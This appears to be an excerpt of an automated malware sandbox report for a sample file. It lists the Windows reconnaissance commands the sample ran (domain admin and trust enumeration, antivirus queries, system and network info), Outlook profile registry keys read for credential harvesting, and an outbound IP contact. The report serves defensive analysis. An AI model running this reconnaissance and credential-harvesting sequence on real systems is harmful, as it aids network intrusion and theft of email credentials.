NtTerminateProcess March 19, 2021, 2:52 p.m.	status_code: 0x00000000 process_identifier: 6220 process_handle: 0x0000000000000448	-1073741558

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	cmd.exe /c chcp >&2
cmdline	net group "Domain Admins" /domain
cmdline	systeminfo
cmdline	net view /all /domain
cmdline	net config workstation
cmdline	chcp
cmdline	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
cmdline	ipconfig /all
cmdline	net view /all

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Harvests credentials from local email clients (2 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	nltest /domain_trusts
cmdline	nltest /domain_trusts /all_trusts

44273.4360444444.dat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All